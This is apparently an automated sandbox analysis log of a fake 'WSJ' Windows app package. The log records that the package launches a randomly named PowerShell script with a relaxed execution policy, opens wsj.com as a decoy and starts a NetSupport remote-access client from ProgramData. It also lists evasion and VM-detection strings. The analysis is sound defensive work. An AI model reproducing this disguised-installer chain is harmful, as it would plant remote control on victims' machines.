                                    Source: HTCTL32.DLL.26.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                    Source: TCCTL32.DLL.26.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                    Source: powershell.exe, 0000001A.00000002.2193452131.0000023179868000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1941852161.0000000005A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: HTCTL32.DLL.26.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                    Source: TCCTL32.DLL.26.drBinary or memory string: VMWare
                                    Source: client32.exe, 00000020.00000002.2492715812.0000000000812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(Z
                                    Source: C:\ProgramData\netsupport\client\client32.exeAPI call chain: ExitProcess graph end nodegraph_32-96225
                                    Source: C:\ProgramData\netsupport\client\client32.exeAPI call chain: ExitProcess graph end nodegraph_32-96417
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_1115E3E1
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110CF9F0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,32_2_110CF9F0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,32_2_11029200
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11178924 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,32_2_11178924
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,32_2_11030A50
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,32_2_11092090
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_1116A469
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BED28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_6BED28E1
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BED87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_6BED87F5
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeMemory allocated: page read and write | page guard

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: Yara matchFile source: amsi64_2564.amsi.csv, type: OTHER
                                    Source: Yara matchFile source: amsi64_7788.amsi.csv, type: OTHER
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: NULL target: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe protection: readonly
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: readonly
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\ProgramData\netsupport\client\client32.exe protection: readonly
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe32_2_1102FB50
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110F21E0 GetTickCount,LogonUserA,GetTickCount,GetLastError,32_2_110F21E0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1110F530 GetKeyState,DeviceIoControl,keybd_event,32_2_1110F530
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,32_2_1109D240
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1109D9C0 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,32_2_1109D9C0
                                    Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                    Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr Binary or memory string: Shell_TrayWnd
                                    Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr Binary or memory string: Progman
                                    Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr Binary or memory string: Progman<
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,32_2_111700E5
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_11170376
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,32_2_11170419
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: GetLocaleInfoA,32_2_11167A6E
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,32_2_1116FFE3
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,32_2_1116FEEE
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,32_2_1117008A
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_111703DD
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,32_2_111702B6
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,32_2_6BEE0F39
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,32_2_6BEE02AD
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,32_2_6BEE2218
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_6BEE21DC
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_6BEE2175
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: EnumSystemLocalesA,32_2_6BEE2151
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,32_2_6BEE2089
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,32_2_6BEEDB7C
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,32_2_6BEDFAE1
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,32_2_6BEE1EB8
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,32_2_6BEE1E5D
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,32_2_6BEE1DB6
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,32_2_6BEE1CC1
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: GetLocaleInfoA,32_2_6BEEDC99
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,32_2_6BEEDC56
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,32_2_6BEE1257
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,32_2_6BEE1680
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{10030ca7-2d34-4b5d-ab65-42a8a50302a9}_temp.pri VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Activities\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Activities.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Workflow.ServiceCore\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Workflow.ServiceCore.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\netsupport VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\ProgramData\netsupport\client\client32.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\ProgramData\netsupport\client\client32.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{cc5f9d8b-94e7-4e6d-8d7d-70b7a8e2a015}_temp.pri VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
